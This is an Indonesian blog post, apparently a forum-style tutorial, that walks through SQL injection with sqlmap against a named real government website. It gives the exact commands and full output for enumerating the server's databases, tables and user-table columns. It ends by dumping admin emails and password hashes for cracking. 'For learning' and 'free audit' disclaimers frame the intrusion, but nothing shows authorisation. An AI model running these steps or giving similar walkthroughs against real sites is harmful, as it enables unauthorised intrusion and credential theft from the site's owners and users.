![[./Mr.Z Blog]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghYrWCnAsqrTRTNEsYP7alruJ9a21Jo8t0M1lNa7YybKgiwO7d62e8OnC9ObrBmRmGLpii7FiIQ16UdognDz2quFiiYpEOBkLxc-KvWZVjX9RpxeVoALVoEo1bj8j17gtQ898DD0FCJLs/s1600/coollogo_com-241712770.png)
Selamat Datang Di Thread Ane
Berhubung ane orang baru, Mohon maaf klo ada ksalahan di Thread ane yang pertama ini
Disini sya akan membahas bagaimana cra melakukan sqli dengan menggunakan sqlmap, dan saya menggunakan OS Backtrack 5 64 Bit GNOME
Sebelum ane mulai, klo ada yg blum tau apa itu sqlmap
Quote
SQLMap
adalah tools yang dibuat dengan bahasa Phyton untuk mengotomatisasikan
SQL Injection,klo di Windows biasa org mke namanya Havij, dimana
pemakaian havij lebih/sangat simple untuk melancarkan sqli, ya taulah
windows<>GUI.tpi Fiturnya kurang lengkap jikalau menggunakan havij
yg Free
Ok, Sekarang sudah tau kan?
Kita Lanjut ke Intinya lagi
Dalam pembelajaran kli ini, kita akan menggunakan contoh slah satu Website Pemerintah yaitu http://jdih.lemsaneg.go.id/ dengan memanfaatkan Flaw pada detail.php?m=
Perlu DiKetahui Terlebih Dahulu
Quote
apa
yang saya ajarkan ialah ilegal, penggunaan materi ini semata mata
untuk tujuan pembelajaran, dan pihak ke tiga atau ke dua dimohon untuk
pemahaman nya ini semata semata AUDIT Gratis dari saya tentang website http://jdih.lemsaneg.go.id/, sebelum ada hacker yang melakukan perusakan terhadap web tersebut.OK?
Langkah 1: test injeksi dengan men-fetch banner mysql (versi mysql)
Dengan menggunakan perintah
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --banner sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 20:01:23 [20:01:23] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27 [20:01:23] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file [20:01:23] [INFO] resuming injection data from session file [20:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [20:01:23] [INFO] testing connection to the target url [20:01:24] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- P[b]lace: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)[/b] --- [20:01:24] [INFO] manual usage of GET payloads requires url encoding [20:01:24] [INFO] the back-end DBMS is MySQL [20:01:24] [INFO] fetching banner [20:01:24] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 5.0.45-community-nt [b]web server operating system: Windows web application technology: PHP 5.2.4, Apache 2.2.6 back-end DBMS operating system: Windows back-end DBMS: MySQL 5.0 banner: '5.0.45-community-nt'[/b] [20:01:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id' [*] shutting down at: 20:01:24
dari hasil injeksi fetch banner mysql yang bru sja kita lakukan, kita mendapatkan positive impact dari target, yaitu keluarnya hasil untuk versi DBMS yaitu : MySQL 5.0 dengan tipe injeksi error-based.
Langkah ke 2: fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db)
Deng an menggunakan perintah
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --current-user --current-db sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 20:11:03 [20:11:03] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox) [20:11:03] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file [20:11:03] [INFO] resuming injection data from session file [20:11:03] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [20:11:03] [INFO] testing connection to the target url [20:11:04] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [20:11:04] [INFO] manual usage of GET payloads requires url encoding [20:11:04] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.2.4, Apache 2.2.6 back-end DBMS: MySQL 5.0 [20:11:04] [INFO] fetching current user [20:11:04] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdih@% [b]current user: 'jdih@%'[/b] [20:11:04] [INFO] fetching current database [20:11:04] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn [b]current database: 'jdihlsn'[/b] [20:11:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id' [*] shutting down at: 20:11:04
Pada langkah ke dua yang kita lakukan ialah menganalisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut
Langkah ke 3: fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (--dbs)
Dengan Menggunakan Perintah
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --dbs sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 20:14:21 [20:14:21] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8 [20:14:21] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file [20:14:21] [INFO] resuming injection data from session file [20:14:21] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [20:14:22] [INFO] testing connection to the target url [20:14:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [20:14:23] [INFO] manual usage of GET payloads requires url encoding [20:14:23] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.2.4, Apache 2.2.6 back-end DBMS: MySQL 5.0 [20:14:23] [INFO] fetching database names [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 8 [20:14:23] [INFO] the SQL query used returns 8 entries [20:14:23] [INFO] starting 8 threads [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': webauth [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': test [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': phpmyadmin [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': mysql [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn_mybb [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': cdcol [20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': information_schema available databases [8]: [b][*] cdcol [*] information_schema [*] jdihlsn [*] jdihlsn_mybb [*] mysql [*] phpmyadmin [*] test [*] webauth[/b] [20:14:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id' [*] shutting down at: 20:14:23
eehh ternyata ada 8 database yang avail, yaitu information_schema, database cdcol, jdihlsn, jdihlsn, mysql, phpmyadmin, test, dan webauth kita langsung injeksi untuk database jdihlsn saja yah, untuk yg lain kalian coba sndiri nanti, dan cri tau sendiri ya.
Langkah ke 4 : fetch list tables di database portal dengan flag (-D portal --tables)
Dengan Perintah
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn --tables sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 20:23:30 [20:23:30] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10 [20:23:30] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file [20:23:30] [INFO] resuming injection data from session file [20:23:30] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [20:23:31] [INFO] testing connection to the target url [20:23:32] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [20:23:32] [INFO] manual usage of GET payloads requires url encoding [20:23:32] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.2.4, Apache 2.2.6 back-end DBMS: MySQL 5.0 [20:23:32] [INFO] fetching tables for database: jdihlsn [20:23:32] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 35 [20:23:32] [INFO] the SQL query used returns 35 entries [20:23:32] [INFO] suppressing possible resume console info because of large number of rows (might take too much time) [20:23:32] [INFO] starting 10 threads Database: jdihlsn [35 tables] +-----------------------+ | attr_agenda | | attr_artikel | | attr_jurnal | | attr_kategori_artikel | | attr_kategori_jurnal | | attr_link | | kd_xmlrpc_news | | lc_produk_hukum_cat | | lc_produk_hukum_map | | master_arsip | | master_document | | master_download | | master_fotter | | master_hukum | | master_kegiatan | | master_multiple_news | | master_news | | master_photo | | master_polling | | master_polling_option | | master_polling_users | | master_profile | | mstr_profil | | online | | profile_visimisi | | rbca_arsip | | rbca_group | | rbca_module | | rbca_navigation | | rbca_rule | | rbca_users | | type_counter | | user_comment | | user_download | | user_profile | +-----------------------+ [20:23:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id' [*] shutting down at: 20:23:32
Langkah ke 5: fetch isi kolum pada setiap tables dengan flag (--columns)
sebelumnya kita fetch dulu list kolum pada tabel tersebut, dan fetch data dari kolum hanya yang penting saja, kita fetch dengan flag -D jdihlsn -T rbca_users --columns
Berikut perintahnya
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn -T rbca_users --columns sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 20:59:14 [20:59:14] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) [20:59:14] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file [20:59:14] [INFO] resuming injection data from session file [20:59:14] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [20:59:14] [INFO] testing connection to the target url [20:59:15] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [20:59:15] [INFO] manual usage of GET payloads requires url encoding [20:59:15] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.2.4, Apache 2.2.6 back-end DBMS: MySQL 5.0 [20:59:15] [INFO] fetching columns for table 'rbca_users' on database 'jdihlsn' [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 12 [20:59:15] [INFO] the SQL query used returns 12 entries [20:59:15] [INFO] starting 10 threads [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': action [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(150) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': browser [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(200) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': ip [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(20) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': last_login [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': datetime [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': login_time [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': datetime [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': online [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(1) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': password [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(250) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': email [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(100) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': fullname [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': group_id [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(2) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': activation [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': uid [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': int(11) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(150) [20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(1) Database: jdihlsn Table: rbca_users [12 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | action | varchar(150) | | activation | smallint(1) | | browser | varchar(200) | | email | varchar(100) | | fullname | varchar(150) | | group_id | smallint(2) | | ip | varchar(20) | | last_login | datetime | | login_time | datetime | | online | smallint(1) | | password | varchar(250) | | uid | int(11) | +------------+--------------+ [20:59:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id' [*] shutting down at: 20:59:15
sekarang kita akan men-fetch hanya isi dari kolum (email, dan password), dengan flag (-D jdilhsn -T rbca_users -C email,password --dump), flag --dump berguna untuk men-dump isi dari kolum kedalam log sqlmap sehingga bisa kita liat secara permanen di hardisk tanpa melakukan injeksi ulang (logging)
Spoiler
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn -T rbca_users -C email,password --dump
hasil yang terlog di folder log/web
Selesai dah
tinggal di decrypt tuh
!Ingat!
Hanya Sebagai Pembelajaran!
Dan Disini Kita Sama-Sama Belajar Teman 
Tidak ada komentar:
Posting Komentar